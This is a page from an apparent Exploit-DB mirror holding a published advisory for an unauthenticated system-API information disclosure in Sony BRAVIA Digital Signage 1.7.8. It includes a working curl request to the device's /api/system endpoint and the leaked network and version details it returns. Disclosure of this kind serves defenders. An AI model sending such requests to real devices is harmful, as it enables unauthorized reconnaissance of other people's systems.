bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/49187.txt
Offensive Security d560e654b7 DB: 2020-12-04 
9 changes to exploits/shellcodes

Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
Coastercms 5.8.18 - Stored XSS
EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting
Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
2020-12-04 05:01:55 +00:00

52 lines
No EOL
2 KiB
Text
Raw Blame History

# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
# Date: 20.09.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://pro-bravia.sony.net
# Version: 1.7.8
Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure
Vendor: Sony Electronics Inc.
Product web page: https://pro-bravia.sony.net
https://pro-bravia.sony.net/resources/software/bravia-signage/
https://pro.sony/ue_US/products/display-software
Affected version: <=1.7.8
Summary: Sony's BRAVIA Signage is an application to deliver
video and still images to Pro BRAVIAs and manage the information
via a network. Features include management of displays, power
schedule management, content playlists, scheduled delivery
management, content interrupt, and more. This cost-effective
digital signage management solution is ideal for presenting
attractive, informative visual content in retail spaces and
hotel reception areas, visitor attractions, educational and
corporate environments.
Desc: The application is vulnerable to sensitive information
disclosure vulnerability. An unauthenticated attacker can
visit several API endpoints and disclose information running
on the device.
Tested on: Microsoft Windows Server 2012 R2
Ubuntu
NodeJS
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5610
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php
20.09.2020
--
$ curl http://192.168.1.20:8080/api/system
{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}
Reference in a new issue View git blame Copy permalink